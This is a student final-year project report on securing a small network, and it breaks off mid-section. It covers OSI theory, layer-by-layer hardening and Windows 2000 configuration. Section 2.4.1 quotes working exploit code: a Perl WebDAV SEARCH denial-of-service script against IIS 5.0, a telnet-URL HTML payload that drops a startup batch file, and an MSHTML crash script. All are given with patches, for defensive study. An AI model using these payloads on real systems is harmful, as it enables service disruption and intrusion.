Faculty of Engineering and Architecture

jinkscabbageΔίκτυα και Επικοινωνίες

23 Οκτ 2013 (πριν από 3 χρόνια και 9 μήνες)

150 εμφανίσεις




Faculty of Engineering and Architecture
Department of Electrical
And
Computer Engineering


Final Year Project report for the 05/06 academic year


Project name:
DFNZ 06
Network Security




Project advisor:
Dr. Ali Hajj

Team members:
Antoine George Akiki
Joseph Melhem Chaoul
Jean Kamal Moukarzel


1
List of Figures and Tables
..................................................................................................4
Abstract
...............................................................................................................................6
Introduction
.........................................................................................................................8
1.

A Brief Overview of Networks
.................................................................................10
1.1

Network Symbols
.............................................................................................10
1.2

Network Components
.......................................................................................11
1.3

Network Structure
.............................................................................................13
1.4

OSI Model Overview
........................................................................................14
1.5

Network Devices
...............................................................................................16
1.5.1 Hubs
.................................................................................................................16
1.5.2 Switches/bridges
..............................................................................................17
1.5.3 Routers and layer 3 switches
...........................................................................18
2.

Network Security Theory
..........................................................................................19
2.1 Physical Layer Security
..........................................................................................19
2.2 Hardware Layer Security
........................................................................................20
2.3 Application Layer Security
.....................................................................................21
2.4 Operating System Layer Security
...........................................................................24
2.4.1 Windows 2000 Vulnerabilities and Solutions
.................................................25
2.4.2 Increasing windows 2000 and XP security (refer to [7])
.................................29
2.5 Network Layer Security
..........................................................................................34
2.5.1 TCP/IP – The Language of the Internet (refer to [12])
....................................35
2.5.2 Attacks against IP (refer to [12])
.....................................................................35
2.5.3 IPSEC policy Architecture (refer to [13])
........................................................38
2.6 Internal Network Security
.......................................................................................39
2.7 Survey of Most Common Threats
...........................................................................41
2.7.1 Attacks Automated by Malicious Codes
.........................................................41
2.7.2 Hackers Attacks (not automated by malicious codes)
.....................................48
2.7.3 DoS
..................................................................................................................51
2.7.4 Social Engineering
...........................................................................................59
3.

Our Network Design
.................................................................................................63
3.1 Topology
.................................................................................................................63
3.2 Securing the Perimeter
............................................................................................64
3.3 Our Network
...........................................................................................................68
4.

Installing the Network
..............................................................................................69
4.1 Plugging the Network and Creating a Domain
.......................................................70
4.1.1 Setting Up the Linksys Product
.......................................................................70
4.1.2 Creating the Domain
........................................................................................71
4.2 Tightening Security
.................................................................................................72
4.2.1 Patches on Windows
........................................................................................72
4.2.2 Disabling USB ports to Protect Against Flash Drives
.....................................72
4.3 Creating Common and User Files
...........................................................................75
4.4 Scanning the Network and Updating Security
........................................................75
4.4.1 Linux Tools
......................................................................................................76
4.4.2 Windows Tools
................................................................................................76
4.5 Confusing the Hackers: Honey Pots
.......................................................................77
4.5.1 What is a Honeypot
..........................................................................................77

2
4.5.2 Classifications of Honeypots
...........................................................................78
4.5.3 Review of most popular Honeypots
.................................................................82
4.5.4 Our selection and work
....................................................................................91
4.6 User Logs
................................................................................................................96
5. Countering the Attacks
...............................................................................................106
5.1 First Attack
...........................................................................................................106
5.2 Second Attack: Physical Attack
............................................................................116
Conclusion
......................................................................................................................118
Reference
........................................................................................................................120
Appendix
.........................................................................................................................122
Appendix A
.................................................................................................................122
Appendix B: PortSentry
..............................................................................................122
Appendix C: Timeline and Budget
.............................................................................129

3
List of Figures and Tables
Figure 1.1: Networking facilitates the access of information (p11)
Figure 1.2: Hierarchal Structure of a Network (p12)
Figure 1.3: OSI layers (p14)
Figure 1.4: Workstations connected with a hub (p16)
Figure 1.5: devices connected with a switch (p16)
Figure 1.6: Typical connections of a router (p17)
Figure 2.1: A Wider View of Internet-connected Networks (p36)
Figure 3.1: Our Network Design (p41)
Figure 2.1: Classification of malicious code (p43)
Figure 2.3: Main types of viruses (p44)
Figure 2.4 Program File Virus (p46)
Figure 2.5: Logic Bomb (p51)
Figure 2.6: DoS (p52)
Figure 2.7: DDoS Attack (p53)
Figure 2.8: DRDoS (p54)
Figure 2.9 DRDoS Reflection (p55)
Figure 2.10: TCP 3 way handshake (p57)
Figure 2.11: Smurf Attack (p57)
Figure 3.1: Network Topologies (p62)
Figure 3.2: Our Network Design (p67)
Figure 4.1: Back Officer Friendly Detective (p79)
Figure 4.2: BOF screen capture showing spoofed services (p82)

4
Figure 4.3: BOF warnings (p82)
Figure 4.4: Specter GUI (p85)
Figure 4.5: A possible deployment of Decoy Server (p87)
Figure 4.6: Honeynet Architecture (p89)
Figure 4.7: Server application output format (p101)
Table 1.1: Network Symbol (p10)

5
Abstract
Network security is a rising issue in all major businesses due to the increase in
sophistication and abundance of security breaches over the past decade. This is why
Deloitte & Touch, a major international auditing firm, proposed to AUB that a group of
graduating computer engineers work on the network security issue as the topic for their
Final Year Project. In this sense, preliminary meetings were arranged by Prof. Kayssi
(ECE Department Chairperson), and held with Mr. Saad Majari, an AUB graduate now
working for Deloitte’s IT department, so that we could be introduced to the company and
its interests concerning network security.
During these meetings, we agreed that two groups of three students each would work on
the topic. The two groups’ supervisor would be Prof. Ali el-Hajj, from the ECE
department. It was also decided that our group would handle setting up a network and
assuring it is secured in all ways possible. The other group of three would therefore have
the task to hack in our network, from the outside but also from the inside, in order to pin
point our network’s weaknesses. The output of this project would be proper
documentation relating all the steps taken to secure the network and dealing with the
attacks.
During the first stage of our Final Year Project, we performed an in depth literature
survey in order to get more acquainted with the subject. Reading material was provided
to us by Mr. Awad, Mr. Majari and by Mr. Brouwer, from Deloitte, in addition to white
papers and documents we found on the internet.

6
The material found relevant to our project is included in this report. Covered topics range
from: network specification and topology, overview of past and occurring security
breaches, security strategies for the different network layers, possible attacks, etc...
With these in depth information, we were able to set up our network in the second stage
of our FYP, and secure it by implementing the security strategies. We were given four
computers equipped with Pentium 2 processors. We thus installed one Windows 2000
server, one Windows 2000 workstation, one Fedora Server and one Fedora Workstation.
Finally, the third and final stage of our FYP was the “attacks” stage. The hackers’ team
attempted to attack our network externally and internally. A full list of documentation is
included in this report.

7
Introduction
Our Final Year Project (FYP), entitled ‘Dfnz06’, is a project involving network security
and attacks. Throughout the academic year, two teams will challenge each others, one
being the security team (our team) and one being the hacking team. The project was
proposed and will be supervised by Deloitte, in cooperation with Pr. Ali Hajj from the
ECE department.

Security of Networks and information systems in general, is essential to businesses that
need to connect to the internet and keep their data safe. It is also essential within the
business, when employees are given specific roles and privileges, which define what part
of the information they can read and/or write.
In this sense, it is important for a business to build a well-secured Network. In doing so,
many factors are to be taken into consideration, as we are tackling a multi-disciplinary
field, who nonetheless must be treated as a whole [1].
The task that was assigned to us was to build a small network, just as small and medium
size businesses (SMB) would do, and document all the guidelines and steps that were
followed to secure this network. In this way, the resulting document could be used as a
reference for students, faculty, but also professionals wanting to learn about the safe
measures that should be taken in order to have a protected network.
However, it does not stop here. It is common practice amongst engineers to test every
design they do. In the case of our FYP, the testing will be a real life situation. Another
group of students will try to hack in our network, from the outside (by connecting to our
firewall), and from the inside (they will be given an account with limited privileges and

8
will try to bypass it). In this way, not only the steps in designing the network will be
documented, but also the measures to be taken when a breach of security is identified.

This report gives an account of what has been done in our FYP during the whole
2005/2006 academic year.
It starts by given a brief overview of networks, as it is essential to fully understand the
way a network operates in order to secure it. It then presents what can be regarded as a
literature survey: a summary of all the information relevant to network security design
that we will be using while building the network. As was stated earlier, many factors
should be taken into consideration such as: the physical layer, the hardware layer, the
application layer, the operating system layer and the network layer. It is also important to
know the enemy when trying to defend a network: therefore, a survey of the most
common threats and how they should be dealt with is presented in this report. Moreover,
this report presents our design: the network we built and its specifications (documenting
the steps taken while building). Finally, the last part of this report is a detailed
documentation of the attacks performed by the hackers’ team and the ways by which we
dealt with such attacks.

9

1. A Brief Overview of Networks
This section presents a review of internetworking terminology, such as the Open System
Interconnection (OSI) reference model and how the layers in the OSI operate. Moreover,
this section gives a brief overview of the devices that are used to support different
network requirements.
1.1 Network Symbols
The following symbols will be used throughout this report to illustrate various network
devices. All graphic are courtesy of Cisco Systems.

10



Router


Firewall


Switch


Workstation


Bridge


Server


Hub


Table 1.1: Network Symbols


1.2 Network Components
The primary purpose of Networks is to enable easy access of information regardless of
place, time, and type of computer system [2].

11

Figure 1.1: Networking facilitates the access of information [2]

As can be seen in the figure above, the big company network is subdivided into the
following network components:
• The Main Office: everyone in this office in connected via a LAN (Local Area
Network). The company’s servers (and hence vital information) are located and
connected via this same LAN.
• A Branch Office: information from the main office’s server can be accessed
remotely (via a multitude of ways: leased line, Virtual Private Network,
Internet…). In this way, although physically far, the branch office seems part of
the main office’s network.
• A Home Office: Employees can work from their homes, with most likely on-
demand connections to the main office (or even the branch office). In this way, an

12
employee working from home can access information from the company’s servers
and use the network’s resources.
• Mobile Users: These are individuals who connect to the main office’s LAN
wherever they are (by a multitude of means, most likely on-demand connection
using phone lines).
The fact that the main office’s LAN in connected to the internet and to other network
components (like the branch office) makes it important to have a secure design. In this
way, vital information will not fall into the wrong hands and the company’s privacy will
be preserved.
1.3 Network Structure
In general, and in almost every enterprise, networks are structured in a hierarchal way:

Access Layer
Distribution Layer
Core Layer

Figure 1.2: Hierarchal Structure of a Network


The access layer of the network, also referred to as the desktop layer, is the point on
which end users are connected to the LAN. In other words, the access layer is any end-
station’s entry point to the network. Sometimes, end users are placed in group according

13
to which resources they need to access the most. Most of the time, when a user needs to
use the printer, or access a server or use the internet; his traffic is directed to the
distribution layer.

The distribution layer, also referred to as the workgroup layer, is the link between the
access layer (hence the users) and the “motorway” [2] of the network, i.e. the core. The
main function of the distribution layer is to perform vital packet manipulation such as:
• Routing,
• Filtering,
• WAN access…
In brief, the distribution layer can be regarded as the policy controller: it determines if
and how packets can access the core. It also determines the fastest way for a user to
access the servers. In any case, once the layer in question decides of the path, it forwards
the request to the core layer.

The main purpose of the core layer, also referred to as the backbone, is to switch traffic
as fast as possible. It also provides quick transport to what is called enterprise services: e-
mail, videoconferencing and most importantly Internet.
1.4 OSI Model Overview
The OSI model is the conceptual framework of how networks are built and operate. As
the figure below illustrates, the OSI model has seven layers:

14

Figure 1.3: OSI layers [2]


The four lower layers define ways for end stations to connect to each others in order to
exchange data. The three upper layers define the way applications (within the end
stations) communicate with each others and with the users. In more details, the roles of
each layer are:
• Application layer: layer at which user interacts with the computer. Protocols at
this layer determine available resources, define communication partners and
synchronize all communication.
• Presentation layer: ensures that information sent by application layer of one end
station will be readable by the application layer of another end station operating
on another system. This is done by encryption for example.
• Session layer: establishes, manages and terminates communication sessions
between presentation layers.

15
• Transport layer: this layer distinguishes between upper layer applications, and
establishes end-to-end connectivity between them. It also defines flow control and
provides reliable or unreliable services for data transfers.
• Network layer: this layer defines the logical source and destination addresses
associated with a specific protocol. It also defines the different paths that exist
through the network and interconnects multiple data links. Note the routers and
layer 3 switches operate at this layer.
• Data-Link layer: this layer defines the physical source and destination addresses,
the network topology. It also supports frame sequencing and flow control. Note
the switches operate at this layer.
• Physical layer: this layer is the most basic of all; it defines the media type,
connector type and signaling type. In other words, this layer specifies the
electrical, mechanical, procedural and functional requirements for activating, de-
activating and maintaining the physical link between end systems. Note that hubs
and bridges operate at this layer.

1.5 Network Devices
1.5.1 Hubs
Hubs operate at the physical layer. This implies that all devices are in the same broadcast
domain and the same collision domain. The devices also share bandwidth. In other words,
devices connected to a hub communicate with each others as if they were on the same
segment. The hub connecting them does not manipulate or view the traffic exchanged.

16


Figure 1.4: Workstations connected with a hub


1.5.2 Switches/bridges
Layer 2 switches (i.e. switches) or bridges operate at the data-link layer. Each segment
connected to a port in the switch has its own collision domain, but all segments are in the
same broadcast domain.
The switch hears every frame that crosses a segment and determines whether it has to
copy it to another segment by looking at the destination address and checking in its MAC
table.

Figure 1.5: devices connected with a switch


17

1.5.3 Routers and layer 3 switches
Routers and layer 3 switched operate at the network layer. They can control broadcasts
and multicasts, they determine the optimal path a frame should take, and they manage
traffic. Usually, routers are the networks doorway to the internet or to a bigger WAN.


Internet
Other LAN
Figure 1.6: Typical connections of a router


18
2. Network Security Theory
Now that we have a brief, but precise and clear understanding of how a network operates,
it is time to tackle the security aspect. How is a network secured from the outside and
from within? What are the different fields that come into play? All those questions were
answered by our researches. Although we have come across a lot of readings, we hereby
present the information we judged to be the most essential and relevant to our project.

Security is multi-dimensional: it spans through different layers. Throughout this section
we will discuss the security of: the physical, hardware, application, operating system and
network layers. Moreover, this section will give the principle rules and guidelines to
secure a network from the inside.
2.1 Physical Layer Security
Physical security is often viewed as the first line of defense of a system [1]. It forbids the
intruder to access the system physically (to sit and access information on an already
logged in computer).
Applying physical layer security to our FYP gives us the following guidelines:
• A person of our team should always be present whenever a computer is logged in.
Logged in computers should never be left unattended.
• If possible, access to the room where our network is located (Khaled JouJou’s
lab), should be controlled and banned to those who do not have business there.
Moreover, the switch and firewall should not be accessible to members outside
the team. If this is not possible, users should be restricted to log in only on certain

19
systems, whether they be identified by MAC addresses (see further sections) or a
hostname. Security can also be enhanced by allowing them to access only during
certain times for example.
• The team should adopt a clear desk policy: vital documents should be stored on
CDs or USB keys, and should not be kept unattended (lock in drawers, take away
home…).
• A proper inventory of all the equipment we have should be done, and no device or
machine should be unplugged and taken away without a reason.
• Our network should be protected against power failures and climate hazards (this
should not be a problem in Mr. Joujou’s labs).
On a larger enterprise scale, other measure can be taken to increase the physical security
of the system: biometrics can be used for ID purposes, visitors should not be left
unattended, server rooms should be equipped with appropriate monitoring devices
(cameras for example), guarded by appropriately trained personnel, or secured with key-
card access doors.
2.2 Hardware Layer Security
There are two aspects of hardware security, the first one consists of security at the
hardware level in CPUs, and the second one consists of hardware security at the level of
the enterprise and the users [1]. An example of a security issue at the CPU level is the
interrupt handling. The interrupt vector table is a target for hackers that are able to exploit
the system vulnerabilities at the lower level.
As for hardware security at the level of the enterprise, the following guideline should be
implemented in our FYP:

20
• Access to a server or a workstation’s bios should be protected by a password
(which only the administrator knows). In this way, a user will not be able to take
control of the machine in addition to accessing data that he would otherwise not
be able to retrieve (given his privileges).
• Appropriate bios configuration should be done to limit drive boot sequence to the
OS drive. A user should not be able to boot from other drives such as floppies or
CDs. Also, by forcing to workstation to only boot from the OS drive, installation
of software or new operating systems will be denied.
• Configurations of routers and/or switches should be password protected.
On a larger enterprise scale, it is also important to protect the access to printers by a
password. Otherwise, a hacker can change a printer’s configuration and reroute printer
outputs to other destinations (theft of information).
2.3 Application Layer Security
Application layer security is very important since it involves entrance of data [1]. The
application layer consists of software and database development mainly. The threats at
this layer are: buffer overflows, backdoors, incompleteness of data and viruses. There are
specific guidelines we will be following to achieve security at this layer.
• Users should be limited to having only one active session with the applications
and the network. In this way, accountability of users is enhanced.
• Users should have identifiable usernames that follow the same pattern for all (ex:
the AUB usernames are composed of the users’ initials). Logs should be entered
in a database and queries can be used to retrieve specific information.

21
• A list of unauthorized software should be established, to prevent users from
installing any undesired, dangerous software (it is recommended to ban user from
installing any software).
• Highly sensitive data should be encrypted before being stored. In this way,
reading or writing such data is more difficult.
• Any software upgrade should be installed in time. However, it is recommended to
test these upgrades and look for any patches that could enhance security.
• Initial passwords should be given to users after being generated in a random way.
• Some password conditions should be set: passwords should not be the same as the
usernames, or the user’s department for example. They should be at least 6 (or 8
in sensitive cases) characters long, and include combinations of letters and
numbers. In this way, guessing of password is almost impossible and cracking
them is a lengthy process for hackers.
• If a user tries to access his account with no results (the password entered is
incorrect), his account should be blocked after 3 trials. Only the administrator
should have the power to unblock the account.
• When the administrator changes the privileges of a user (after a promotion or a
demotion for example), the user should automatically be logged off and asked to
log in again. Moreover, if a user account is deleted, the user should also be logged
of (to prevent this user of doing unnecessary and dangerous operations when in
fact, he’s not allowed to). In this way, user accountability and responsibility is
enforced.

22
• The user profile should be complete and informative. In a company for example,
it should include the department of the user, his ranking, etc. To force the user to
fill in vital information in his profile, some fields should be made obligatory. In
this way, if ever the user’s information is needed, it will be complete and clear
and accountability is thus enforced.

The biggest threat resulting from many applications is their vulnerability to "buffer
overflow" attacks which usually results in the hacker having access to the system with the
rights of whatever user account the application was running under.

The following are some general guidelines related to applications:

More secure equivalents for insecure applications should be used (ex: ssh
instead of telnet, since telnet is inherently insecure due to the fact that
passwords are transmitted over the wire as clear text).

Applications should be kept up-to-date with the latest versions. Many
releases are specifically developed to address security issues.

Ports that an application opens up should be determined and closed if they
are not absolutely necessary.

The application vendor's Web site should regularly be checked for
information on how to make the application more secure and for any news
items or patches that address newly-discovered security vulnerabilities.

23

In the case of a Web server, proper programming techniques can ensure
that CGI scripts are secure.

Also in the case of a Web server, if Web page updates are fairly
infrequent, a floppy disk may be used to "sneaker-net" the updated HTML
files by logging into the console as root, mounting the floppy disk,
copying the files into the DocumentRoot directory, and then unmounting
the floppy. Doing so would eliminate the need to run an ftp server service
and enabling an account for the person who maintains the pages.
2.4 Operating System Layer Security
As will be seen in the next section of this report, the computers we were provided with
have Pentium2 processors. We therefore decided to install Windows2000 on them, since
WindowsXP would be too slow, as well as Fedora. This section aims to present the
vulnerabilities and protection schemas for Windows2000 Operating System and Linux
OS.
Hardening the operating system involves many things that are not only operating system-
specific, but may often vary from one "flavor" of an operating system to another. Typical
steps, whatever the OS, include:

Disabling all default accounts and groups that are not needed. When an
operating system is installed it sets up quite a few user accounts and
groups by default (like the guest account, or other application accounts).

24

The startup configuration can be changed so that only necessary services
are running. Many services open TCP/IP "ports" which hackers find when
running port scans against systems. Thus, closing all unnecessary ports by
disabling unnecessary services or application is a common practice.

Server consoles that are not being used should be logged off. This is of
particular importance for Internet-connected systems.
2.4.1 Windows 2000 Vulnerabilities and Solutions
 Microsoft IIS 5.0 WebDAV 'Search' Denial of Service is a vulnerability that was
published in March 16, 2001. WebDAV contains a flaw in the handling of
unusually long requests, submitting a valid yet unusually long WebDAV 'search'
request could restart the IIS services and possibly cause the server to stop
responding. The following exploit has been provided by Georgi Guninski [4]:

#!/usr/bin/perl
use IO::Socket;
print f "IIS 5.0 SEARCH\n wait some time\n";
if(@ARGV < 2) { die "\nUsage: IIS5host port \n"; }
$port = @ARGV[1];
$host = @ARGV[0];
sub vv()
{
$ll=$_[0]; #l ength of buffer
$ch=$_[1];
$socket = IO::Socket::INET->new(PeerAddr => $host,PeerPort => $port,Proto => "TCP") ||
return;
$over=$ch x $ll; #string to overflow
$xml='<?xml version="1.0"?><D:s earchrequest xmlns:D="DAV:"><D:sql>SELECT
DAV:displayname
from SCOPE("'.$over.'")</D:sql></D:searchrequest>'."\n";
$l=length($xml);
$req="SEARCH / HTTP/1.1\nContent-type: text/xml\nHost: $host\nContent -length:
$l\n\n$xml\n\n";
syswrit e($socket,$req,length($req));
print ".";
$socket->read($res,3000);
print "r=".$res;

25
close $socket;
}
do vv(126000,"V");
sleep(1);
do vv(126000,"V");
#Try 125000 – 128000

Solution :
Microsoft patch Q291845_W2K_SP2_x86_en
http://download.microsoft.com/download/win2000platform/Patch/q291845/NT5/
EN-US/Q291845_W2K_SP2_x86_en.EXE
 Microsoft IE 5.01/ 5.5 Telnet Client File Overwrite is a vulnerability that was
published on March 09, 2001. Services for Unix 2.0 contains a client side logging
option which records all information exchanged in a telnet session. A
vulnerability exists that could enable a remote user to invoke the telnet client and
execute arbitrary commands on a target machine via IE. This is achieved by
crafting a URL composed of command line parameters to the telnet client, which
would invoke 'telnet.exe'. Telnet would connect to the host and initiate the
logging of session information, access to this file will allow an attacker to write
and execute arbitrary commands which may be executed later.

The following exploit has been provided by Oliver Friedrichs [4]:

telnet:-f%20\ fil e.txt%20host
The following is an example of a malicious HTML message which could cause data that is received
from the destination port on the host "host" to be writt en to the file "fil ename" in the startup di rectory
for all users. If the logged in user has the appropri ate permissions, a bat ch file will be created and
executed upon future authentication.
<html>

26
<frameset rows="100%,*">
<frame src=about:blank>
<frame src=telnet:-f%20\Documents%20and%20Settings\All%20Users\start%20menu\programs\st
artup
\start.bat%20host%208000>
</frameset>
</html>

Solution
Microsoft has released a patch which rectifies this issue:
http://www.microsoft.com/windows/ie/download/critical/q286043/default.asp

 Microsoft Outlook vcard Buffer Overflow is a vulnerability that was published on
February 22, 2001. Due to an unchecked buffer in Microsoft Outlook, it is
possible for a remote user to execute arbitrary code on a victim's machine. If a
maliciously crafted .vcf file containing malformed data in the 'Birthday' field is
sent as an attachment and executed, the maliciouslyembedded code could be run
on the recipient's machine. An exploit has been provided by Ollie Whitehouse [5].
A solution is also provided by a windows patch:
http://www.microsoft.com/windows/ie/download/critical/q283908/default.asp

 Windows 2000 EFS Temporary File Retrieval Vulnerability was published on
January 19, 2001. EFS is the encrypted file system package designed to secure
sensitive information. It is included with the Windows 2000 Operating System,
distributed and maintained by Microsoft Corporation. A problem in the package
could allow the recovery of sensitive data encrypted by the EFS. When the file is
selected for encryption and backup copy of the file is moved into the temporary
directory using the file name efs0.tmp. The data from this file is taken and

27
encrypted using EFS, with the backup file being deleted after the encryption
process is performed. However, after the file is encrypted and the file is deleted,
the blocks in the file system are never cleared, thus making it possible for any
user on the local host to access the data of the encrypted file, which falls outside
of the constrains of access control imposed by the Operating System. This makes
it possible for a malicious user to recover sensitive data encrypted by EFS.
 Microsoft WINS Domain Controller Spoofing Vulnerability was published on
January 17, 2001. Windows Internet Naming Service (WINS) ships with
Microsoft Windows NT Server. WINS resolves IP addresses with network
computer names in a client to server environment. A distributed database is
updated with an IP address for every machine available on the network.
Unfortunately WINS does not properly verify the registration of domain
controllers. It is possible for a user to modify the entries for a domain controller,
causing the WINS service to redirect requests for the DC to another system. This
can lead to a loss of network functionality for the domain. The DC impersonator
can also be set up to capture username and password hashes passed to it during
login attempts. An exploit has been provided by David Byrne [6], and a
workaround by Paul Schmehl [4].
 Microsoft MSHTML.DLL Crash Vulnerability was published on January 15,
2001. MSHTML.DLL is the shared library for parsing HTML in Internet Explorer
and related applications. It may be possible for an attacker to crash this library
remotely and cause a denial of service with special Jscript code. This bug involves
Jscript's ability to handle multiple window objects. If a window object is deleted

28
after it receives data and then re-initalized, the library will reportedly crash. This
behavior has been attributed to a stack overflow by its discoverer. It is reportedly
not exploitable in any way that may permit an attacker to gain access to the victim
host. The following exploit has been provided by Thor Larholm:
<iframe id=test style="display:none"></iframe>
<script>
Larholm = {}; // Object literal
test.document.open(); // Stream data
test.document.write("<s"+"cript>top.Larholm.test=0</s"+"cript>");
delete Larholm;
Larholm = {}; // Crash
</script>
2.4.2 Increasing windows 2000 and XP security (refer to [7])
 Editing the registry and disabling services can lead to problems. We must backup
before we change any setting and change only one setting at a time.
- Registry settings are edited with a program call regedit32. Click on the Start Menu >
run > type regedt32
Services are turned on and off by the services.msc. Clock on the Start Menu > Run > type
services.msc
 Null sessions allow unwanted users to gain access to our computers, they are
opened on NetBios ports 139 and 445. NetBios is Windows' default protocol for "File and
Print Sharing." With automated tools, hackers will gain access to crucial system
information such as accounts and passwords. NULL sessions are a built in
communication share using an anonymous user and a NULL password on the NetBios
port. The easiest way to stop NULL session is by disabling "File and Print Sharing" on

29
all network devices. In order to do so on Windows 2000 go to Control Panel > Network
and Dial-up Connections and select the proper connection.

If these services are required then we will:
- make a registry entry to protect from sending sensitive data through the NetBios
port.
- Open regedt32 from the Run Menu.
- Select HKEY_LOCAL_MACHINE > System > CurrentControlSet > Control >
LSA.
- The key we want to edit is RestrictAnonymous.
- We will change the value to a 1 or 2. A setting of 1 indicates that null
connections are allowed but sensitive data is blocked being sent via the
connection (only option available in NT4). A setting of 2 will disallow any NULL
connections; this may conflict with some 3rd party software. There are a few
hacking tools that will work on a level 1 setting and retrieve information. Reboot
the machine when done.

Another way to prevent access to port 139 is to disable NetBIOS over TCP/IP.
Windows will cascade to port 445 to respond to NULL sessions and other
requests.


 Disable SNMP services

30
If null sessions are disabled, another easy way to gain system information is through
public SNMP.

SNMP permits the monitoring and managing of a network from a single
workstation or several workstations, called SNMP managers. It's a family of
specifications that provide a means for collecting network management data from the
devices residing in a network. With an SNMP manager, you can query the network's
devices regarding the nature of their functions.
If there are no programs using SNMP, we can disable this service. This is the easiest way
to protect against hacks and free up some memory.

If SNMP access is needed, then we set SNMP not to run in a public mode:
- Open the registry editor.
- Go to HKLM > System > CurrentControlSet > Services > SNMP > Parameters >
ValidCommunities.
- Select Security> Permissions and change them to permit only approved users
access.

There is one more step to disabling public access to SNMP.

- Go to HKLM > System > CurrentControlSet > Services > SNMP > Parameters >
ExtensionAgents and delete the value that contains the
LANManagerMIB2Agent. Then rename the other entries to update the
sequence, ie. 2, 3 etc. until the sequence begins with a 1.


31
 Disable unused services since they take up space and allow hackers to attack
through the ports they leave open. We should disable messenger if not used since they
give the hacker system rights
 Local Security Policy Tips: To edit Windows 2000 or XP's Local Security
Policy follow the following path:
- Start > Administration Tools > Local Security Policy. The Local Security editor has the
same feel as the registry editor.
-Always set a password for the Administrator account .
- Set the password to 6 or more characters, Account Policies > Password Policy >
Minimum Password Length.
 Ensure passwords use a combination of letters and numbers
To enable this setting enable Account Policies > Password Policy > Password
Must Meet Complexity Requirements.

 Enable Account Lockout Period
 Account Lockout Duration
 Require users to change their passwords
 Account Lockout Threshold
 Account Lockout Threshold
 Account Tips: The more accounts on a computer the more entry points attackers
can try. Default accounts will always get us into trouble because the attacker does not

32
have to guess a user name. We must always disable the guest account if it is not needed.
Their are tools that will allow an attacker to create accounts with Administrative
privileges on an unpatched Windows 2000 system .We must not login as administrator if
we do not need to. Viruses or malicious scripts will try to run programs or modify
registry settings. If the user does not have access to perform these tasks than the
malicious script cannot either.
 Terminal Services : 128 bit encryption must be used to avoid packet sniffers.
Change terminal services to log users off. If a session is left open a hacker might enter
that person's session. Another safety measure with terminal services, change the port
from the default port of 3389. If you want to learn how to perform this edit refer to
appendix A. This method will not really stop attacks, just avoid attackers doing a quick
scan or targeting port 3389.
 Disable DNS Transfers - If using active directory limits DNS zone transfers.
Attackers are allowed to scan the network and gain information of IP addresses and ports.
While there is no damage to our system by performing these scans, attackers can learn a
lot about your network. To disable go to:
- Start > Programs > Administrative Tools > Computer Management > Services and
Applications > DNS > [server] > Forward Lookup Zones > [zone_name] > Properties.
-Add the IP addresses that are on your network. The best option is to disable zone
transfers by unchecking Allow Zone Transfers.
 Port Scanners are very useful tools for finding ports open on our system or
network. Here are a couple we might try,
SuperScan
,
NetScanTools Pro
,
GFI
, and
NMap
.

33
2.5 Network Layer Security
Network Layer Security among mutually trusting hosts is a relatively straightforward
problem to solve. The standard protocol technique, employed in IPSEC, involves
"encapsulating" an encrypted Network Layer packet inside a standard Network packet,
making the encryption transparent to intermediate nodes that must process packet headers
for routing, etc. Outgoing packets are authenticated, encrypted, and encapsulated just
before being sent to the network, and incoming packets are decapsulated, verified, and
decrypted immediately upon receipt. Key management in such a protocol is similarly
straightforward in the simplest case. Two hosts can use any key-agreement protocol to
negotiate keys with one another, and simply use those keys as part of the encapsulating
and decapsulating packet transforms.
In many applications, security at the network later has a number of advantages over
security provided elsewhere in the protocol stack. Network semantics are usually hidden
from applications, which therefore automatically and transparently take advantage of
whatever network layer security services their environment provides. Especially
importantly, the network layer offers a remarkable flexibility not possible at higher- or
lower- abstractions: security can be configured end-to-end (protecting traffic between two
hosts), route-to-route (protecting traffic passing over a particular set of links), edge-to-
edge (protecting traffic as it passes between "trusted" networks via an "untrusted" one),
or in any other configuration in which network nodes can be identified as appropriate
security endpoints.

34
2.5.1 TCP/IP – The Language of the Internet (refer to [12])
TCP/IP
(Transport Control Protocol/Internet Protocol) is the ``language'' of the Internet.
Anything that can learn to ``speak TCP/IP'' can connect to the Internet. This is
functionality that occurs at the Network (IP) and Transport (TCP) layers in the ISO/OSI
Reference Model. Consequently, a host that has TCP/IP functionality (such as Unix,
OS/2, MacOS, or Windows NT) can easily support applications (such as Netscape's
Navigator) that uses the network.
As noted, IP is a ``network layer'' protocol. This is the layer that allows the hosts to
actually ``talk'' to each other. Such things as carrying datagrams, mapping the Internet
address (such as 10.2.3.4) to a physical network address (such as 08:00:69:0a:ca:8f), and
routing, which takes care of making sure that all of the devices that have Internet
connectivity can find the way to each other.

2.5.2 Attacks against IP (refer to [12])
A number of attacks against IP are possible. Typically, these exploit the fact that IP does
not perform a robust mechanism for authentication for the source of the packet. This is
not necessarily a weakness by definition , but it is an important point, because it means
that the facility of host authentication has to be provided at a higher layer on the ISO/OSI
Reference Model. Today, applications that require strong host authentication (such as
cryptographic applications) do this at the application layer.
 IP Spoofing
This is where one host claims to have the IP address of another. Since many systems
(such as router access control lists) define which packets may and which packets may not

35
pass based on the sender's IP address, this is a useful technique to an attacker: he can
send packets to a host, perhaps causing it to take some sort of action.
Additionally, some applications allow login based on the IP address of the person making
the request (such as the Berkeley r-commands ). These are both good examples how
trusting untrustable layers can provide security that is considered weak.
 IP Session Hijacking
This is a relatively sophisticated attack, first described by Steve Bellovin. It is very
dangerous, however, because there are now toolkits available in the underground
community that allow even inexperienced hackers to perform this attack. IP Session
Hijacking is an attack whereby a user's session is taken over, being in the control of the
attacker. If the user was in the middle of email, the attacker is looking at the email, and
then can execute any commands he wishes as the attacked user. The attacked user simply
sees his session dropped, and may simply login again, perhaps not even noticing that the
attacker is still logged in on his account.
For the description of the attack, refer to the large network of networks in Figure 2.1.









36
Figure 2.1:
A Wider View of Internet-connected Networks


In this attack, a user on host A is carrying on a session with host G. Perhaps this is a
telnet session, where the user is reading his email, or using a Unix shell account from
home. Somewhere in the network between A and G sits host H . The person on host H
watches the traffic between A and G, and runs a tool which starts to impersonate A to G,
and at the same time tells A to shut up, perhaps trying to convince it that G is no longer
on the net (which might happen in the event of a crash, or major network outage). After a
few seconds of this, if the attack is successful, host H has ``hijacked'' the session of our
user. Anything that the user can do legitimately can now be done by the attacker,
illegitimately. As far as G knows, nothing has happened.
This can be solved by replacing standard telnet-type applications with encrypted versions
of the same thing. In this case, the attacker can still take over the session, but he'll see
only ``gibberish'' because the session is encrypted. The attacker will not have the needed

37
cryptographic key(s) to decrypt the data stream from G, and will, therefore, be unable to
do anything with the session.
2.5.3 IPSEC policy Architecture (refer to [13])
Let us examine the architecture of Network Layer Security more closely, using IPSEC as
a specific example. In this environment, policy must be enforced whenever packets arrive
